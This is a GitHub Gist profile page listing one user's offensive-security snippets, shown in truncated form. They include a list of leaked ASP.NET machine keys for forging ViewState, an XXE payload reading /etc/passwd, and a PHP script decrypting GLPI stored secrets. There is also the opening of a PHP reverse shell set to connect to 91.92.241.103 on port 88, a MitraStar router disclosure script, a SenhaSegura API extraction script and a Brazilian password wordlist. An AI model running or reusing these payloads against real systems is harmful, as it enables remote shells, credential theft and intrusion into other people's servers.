Skip to content

Instantly share code, notes, and snippets.

View 000pp's full-sized avatar
😶‍🌫️

daniel 000pp

😶‍🌫️
View GitHub Profile
@000pp
000pp / aspnet_machinekeys.txt
Created February 20, 2025 05:41
Better aspnet_machinekeys.txt for blacklist3r.py (/badsecrets/badsecrets/resources/aspnet_machinekeys.txt)
This file has been truncated, but you can view the full file.
0007EDC7D387A1C86422F769DDF45DE4C2FEEDBE21460EACD2F64D2B749A4159A497B6EF0B08252CB24C09DA993DA6F3524CE73B945BA531EB3C7DD4FFC0DFBB,4FCA412AF185EBF793CF3E79E1AF7098E1C3CEACD6B4C43B10252B69174A3217
00428FF15305A21896B63F9C9F83F0495D39E2E835E233CCA8AF690C8D8AFC475B92C982340010280E1EDD07BFB7ADC40B8C82B0AD2972E3FFD0ECA97A5D98E3,F8FD040DE95A6BB9F5A23AE4439761C4BBF65E39E0CFD2A3
004E8483C6E007C8CED7DB6908721B41D8CCFC4E0D5CF0B462EE9905B3B1575248FD017CA159985EA859A1FE4BD100DFC1A5615C3EAAE7F1D4E9507B747B751B,02F509E61567C6E1A7E39E313CF49B8ACBD6C0420B2D64B66C44F1C43E2D1B71
004EE2BD151447E64E7273DCE070EE34E55507E0243F7A044A2F4E81ED5D65653DE63E483FABAB206E96116004F22DDA817ACAD836887685370B8EA20E707B70,69EFDD5E7C83C5DAEA87DC6B17207496D4412E719FCE08EF690C42A8980C84B5
00575EFEE86BAB31F844C82EB42BE8CEB6C50F737A2A0FD78B62402ECEB3B120,F2D0D509462E61125BA4D46C6E26B5F8B9B4783A36800313B1930D261D17A416
0074D9E5776602E629B362073918A43AD0D631800111D0453DB3416D3827C95B81F575B388A6B425E39AC49BCDC2DC8A57AD2207DC726E78544525A83AB4FE08,245ED
@000pp
000pp / mitrastar.py
Created September 24, 2024 02:54
MitraStar Unauthenticated Information Disclosure
# Don't forget to install the required libraries:
# BeautifulSoup, rich and requests
from rich.console import Console
from bs4 import BeautifulSoup
console = Console()
from requests import get
from urllib3 import disable_warnings
disable_warnings()
@000pp
000pp / hfye.txt
Created September 22, 2024 02:30
... .......... .... .... ...........
@@@ @@@&&&&&&&& @@@@ /@@@ *@@@&&&&&&&%
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<definitions targetNamespace="http://example.org">
<foo>&xxe;</foo>
</definitions>
<?xml version="1.0" encoding="UTF-8"?>
<wsdl:definitions
name="SeiWS"
targetNamespace="Sei"
xmlns="http://schemas.xmlsoap.org/wsdl/"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:http="http://schemas.xmlsoap.org/wsdl/http/"
# All Windows Event logs
[monitor://C:\Windows\System32\Winevt\Logs\*.evtx]
disabled = false
index=winevtx
@000pp
000pp / decrypt.php
Created April 28, 2024 03:10
Decrypt GLPI encrypted values with glpicrypt.key
<?php
$encoded_value = base64_decode('Enconded_Base64_String');
$nonce = substr($encoded_value, 0, SODIUM_CRYPTO_AEAD_XCHACHA20POLY1305_IETF_NPUBBYTES);
$ciphertext = substr($encoded_value, SODIUM_CRYPTO_AEAD_XCHACHA20POLY1305_IETF_NPUBBYTES);
$private_key = file_get_contents('glpicrypt.key');
$decrypted = sodium_crypto_aead_xchacha20poly1305_ietf_decrypt($ciphertext, $nonce, $nonce, $private_key);
echo "Result: " . $decrypted;
?>
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '91.92.241.103'; // CHANGE THIS
$port = 88; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
@000pp
000pp / senhasegura.py
Last active April 8, 2024 02:25
SenhaSegura API Extraction
from requests import get, post
from rich import print
from urllib3 import disable_warnings
disable_warnings()
import json
def main() -> None:
request_body = {
@000pp
000pp / brazil.txt
Last active April 8, 2024 02:35
Brazilian Wordlist
atualizacao
Atualizacao
atualizacaoH
AtualizacaoH
atualizacaob
AtualizaoB
carga
Carga
erros
Erros